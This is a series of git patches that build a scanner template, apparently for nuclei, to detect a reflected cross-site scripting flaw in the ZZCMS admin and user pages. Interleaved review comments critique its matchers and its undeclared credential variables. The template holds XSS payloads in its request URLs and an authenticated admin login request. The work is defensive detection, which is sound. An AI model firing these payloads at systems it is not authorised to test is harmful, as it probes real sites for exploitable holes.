From 768aba3b0973afd473dedc063b0a3a5999c26fee Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 16 Apr 2022 14:32:25 +0530
Subject: [PATCH 1/4] Create zzcms-xss.yaml
---
 vulnerabilities/other/zzcms-xss.yaml | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 vulnerabilities/other/zzcms-xss.yaml
diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml
new file mode 100644
index 0000000000..35d869cf44
--- /dev/null
+++ b/vulnerabilities/other/zzcms-xss.yaml
@@ -0,0 +1,33 @@
+id: zzcms-xss
+
+info:
+ name: ZZCMS XSS
+ author: ritikchaddha
+ severity: medium
+ reference:
+ - https://github.com/JcQSteven/blog/issues/20
+ tags: zzcms,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/user/msg.php?action=modify&id=198445%22%2balert(233)%2b%221"
+ - "{{BaseURL}}/admin/usermodify.php?id=1%22%2balert(345)%2b%22"
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - "alert(233)"
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "alert(345)"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 406f8fab71222eb33213329377f87d5ac86759fd Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 18 Apr 2022 02:37:25 +0400
Subject: [PATCH 2/4] Update zzcms-xss.yaml
---
 vulnerabilities/other/zzcms-xss.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml
index 35d869cf44..7530ac734d 100644
--- a/vulnerabilities/other/zzcms-xss.yaml
+++ b/vulnerabilities/other/zzcms-xss.yaml
@@ -14,6 +14,7 @@ requests:
 - "{{BaseURL}}/user/msg.php?action=modify&id=198445%22%2balert(233)%2b%221"
 - "{{BaseURL}}/admin/usermodify.php?id=1%22%2balert(345)%2b%22"
+ stop-at-first-match: true
 matchers-condition: or
 matchers:
 - type: word
From 8c6cc9b9ebd30e8eb0c201225b0ab5e9772c4ebc Mon Sep 17 00:00:00 2001
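Review bot: Under `matchers-condition: or` the third matcher (`type: status` with `200`) is satisfied by any page that answers 200, so the template flags every reachable target whether or not the payload is reflected, and the two word matchers never decide the outcome; PATCH 2/4 keeps this matcher and inherits the issue (its `stop-at-first-match: true` will then stop at the first 200 regardless of reflection). Remove the `- type: status` matcher and keep `or` over the two word matchers. The words `alert(233)` / `alert(345)` also match an HTML-encoded reflection such as `&quot;+alert(233)+&quot;`, which is not an injection; matching on the unescaped prefix, e.g. `- "\"+alert(233)+\""`, is tighter. `condition: and` on a single-word matcher and `part: body` (the default) are no-ops and can be dropped.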
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 24 Jul 2022 19:13:49 +0530
Subject: [PATCH 3/4] Update zzcms-xss.yaml
---
 vulnerabilities/other/zzcms-xss.yaml | 44 ++++++++++++++++++++++----------------------
 1 file changed, 22 insertions(+), 22 deletions(-)
diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml
index 7530ac734d..304ddbde7b 100644
--- a/vulnerabilities/other/zzcms-xss.yaml
+++ b/vulnerabilities/other/zzcms-xss.yaml
@@ -1,34 +1,34 @@
 id: zzcms-xss
 info:
- name: ZZCMS XSS
+ name: ZZCMS2019 - Cross-Site Scripting
 author: ritikchaddha
 severity: medium
 reference:
 - https://github.com/JcQSteven/blog/issues/20
- tags: zzcms,xss
+ metadata:
+ verified: true
+ tags: zzcms,xss,authenticated
 requests:
- - method: GET
- path:
- "{{BaseURL}}/user/msg.php?action=modify&id=198445%22%2balert(233)%2b%221"
- - "{{BaseURL}}/admin/usermodify.php?id=1%22%2balert(345)%2b%22"
+ - raw:
+ - |
+ POST /admin/logincheck.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- stop-at-first-match: true
- matchers-condition: or
+ admin={{username}}&pass={{password}}
+
+ - |
+ GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ req-condition: true
 matchers:
- - type: word
- words:
- - "alert(233)"
- part: body
+ - type: dsl
+ dsl:
+ - "contains(all_headers_2, 'text/html')"
+ - "status_code_2 == 200"
+ - 'contains(body_2, "参数 1\"+alert(document.domain)+")'
 condition: and
-
- - type: word
- words:
- - "alert(345)"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
From ac96218aae3450e2b1435214ecd79131f9933333 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 24 Jul 2022 21:16:05 +0530
Subject: [PATCH 4/4] Update zzcms-xss.yaml
---
 vulnerabilities/other/zzcms-xss.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
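Review bot: The login request interpolates `{{username}}` and `{{password}}`, but the template neither declares these variables nor says where they come from, so a reader cannot tell that valid ZZCMS admin credentials have to be passed in at run time (for instance via `-var`); when they are absent the scanner will presumably report the unresolved variables and skip the request, and the template simply never matches. Add a `description` under `info` that states the check is authenticated and which variables it expects, e.g. `description: Authenticated check; requires valid admin credentials supplied as the username and password variables.`. Nothing verifies that request 1 actually logged in, so a wrong password and a not-vulnerable target produce the same silent negative; a condition on response 1 (what `logincheck.php` returns on success is not visible here) would separate the two cases.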
diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml
index 304ddbde7b..c6ae32d33b 100644
--- a/vulnerabilities/other/zzcms-xss.yaml
+++ b/vulnerabilities/other/zzcms-xss.yaml
@@ -1,7 +1,7 @@
 id: zzcms-xss
 info:
- name: ZZCMS2019 - Cross-Site Scripting
+ name: ZZCMS - Cross-Site Scripting
 author: ritikchaddha
 severity: medium
 reference: